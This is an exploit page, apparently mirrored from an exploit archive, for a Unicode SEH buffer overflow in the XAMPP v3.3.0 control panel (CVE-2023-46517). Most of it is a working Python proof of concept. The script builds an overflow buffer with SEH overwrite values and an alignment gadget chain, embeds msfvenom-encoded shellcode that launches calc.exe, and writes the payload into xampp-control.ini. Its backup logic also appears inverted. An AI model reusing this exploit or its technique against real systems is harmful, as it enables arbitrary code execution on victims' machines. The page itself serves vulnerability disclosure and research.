Share
## https://sploitus.com/exploit?id=PACKETSTORM:175381
# Exploit Title: XAMPP v3.3.0 โ€” '.ini' Buffer Overflow (Unicode + SEH)  
# Date: 2023-10-26  
# Author: Talson (@Ripp3rdoc)  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe  
# Version: 3.3.0  
# Tested on: Windows 11  
# CVE-2023-46517  
  
##########################################################  
# _________ _______ _ _______ _______ _ #  
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #  
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #  
# | | | (___) || | | (_____ | | | || \ | | #  
# | | | ___ || | (_____ )| | | || (\ \) | #  
# | | | ( ) || | ) || | | || | \ | #  
# | | | ) ( || (____/\/\____) || (___) || ) \ | #  
# )_( |/ \|(_______/\_______)(_______)|/ )_) #  
# #  
##########################################################  
  
# Proof of Concept:  
  
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"  
# 2.- Open the application (xampp-control.exe)  
# 3.- Click on the "admin" button in front of Apache service.  
# 4.- Profit  
  
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/  
  
# Greetingz to EMU TEAM (ยฌโ€ฟยฌ)โฉ™  
  
from pwn import *  
import shutil  
import os.path  
  
buffer = "\x41" * 268 # 268 bytes to fill the buffer  
nseh = "\x59\x71" # next SEH address โ€” 0x00590071 (a harmless padding)  
seh = "\x15\x43" # SEH handler โ€” 0x00430015: pop ecx ; pop ebp ; ret ;  
padd = "\x71" * 0x55 # padding  
  
eax_align = "\x47" # venetian pad/align  
eax_align += "\x51" # push ecx  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x58" # pop eax -> eax = 0019e1a0  
eax_align += "\x71" # venetian pad/align   
eax_align += "\x05\x24\x11" # add eax,0x11002300  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x50" # push eax   
eax_align += "\x71" # pad to align the following ret  
eax_align += "\xc3"; # ret into eax?  
  
# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin  
# Payload size: 512 bytes  
shellcode = (  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"  
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"  
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"  
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"  
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"  
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"  
)  
  
shellcode = buffer + nseh + seh + eax_align + padd + shellcode  
  
  
check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")  
  
if check_file:  
  
print("[!] Backup file found. Generating the POC file...")  
pass  
else:   
# create backup  
try:  
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")  
print("[+] Creating backup for xampp-control.ini...")  
print("[+] Backup file created!")  
except Exception as e:  
print("[!] Failed creating a backup for xampp-control.ini: ", e)  
  
try:  
  
# Create the new file  
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:  
file.write(f"""[Common]  
Edition=  
Editor=  
Browser={shellcode}  
  
Debug=0  
Debuglevel=0  
Language=en  
TomcatVisible=1  
Minimized=0  
  
[LogSettings]  
Font=Arial  
FontSize=10  
  
[WindowSettings]  
Left=-1  
Top=-1  
Width=682  
Height=441  
  
[Autostart]  
Apache=0  
MySQL=0  
FileZilla=0  
Mercury=0  
Tomcat=0  
  
[Checks]  
CheckRuntimes=1  
CheckDefaultPorts=1  
  
[ModuleNames]  
Apache=Apache  
MySQL=MySQL  
Mercury=Mercury  
Tomcat=Tomcat  
  
[EnableModules]  
Apache=1  
MySQL=1  
FileZilla=1  
Mercury=1  
Tomcat=1  
  
[EnableServices]  
Apache=1  
MySQL=1  
FileZilla=1  
Tomcat=1  
  
[BinaryNames]  
Apache=httpd.exe  
MySQL=mysqld.exe  
FileZilla=filezillaserver.exe  
FileZillaAdmin=filezilla server interface.exe  
Mercury=mercury.exe  
Tomcat=tomcat8.exe  
  
[ServiceNames]  
Apache=Apache2.4  
MySQL=mysql  
FileZilla=FileZillaServer  
Tomcat=Tomcat  
[ServicePorts]  
Apache=80  
ApacheSSL=443  
MySQL=3306  
FileZilla=21  
FileZill=14147  
Mercury1=25  
Mercury2=79  
Mercury3=105  
Mercury4=106  
Mercury5=110  
Mercury6=143  
Mercury7=2224  
TomcatHTTP=8080  
TomcatAJP=8009  
Tomcat=8005  
[UserConfigs]  
Apache=   
MySQL=  
FileZilla=  
Mercury=  
Tomcat=  
  
[UserLogs]  
Apache=  
MySQL=  
FileZilla=  
Mercury=  
Tomcat=  
""")  
print("[+] Created the POC!")  
  
except Exception as e:  
print("[!] Failed creating the POC xampp-control.ini: ", e)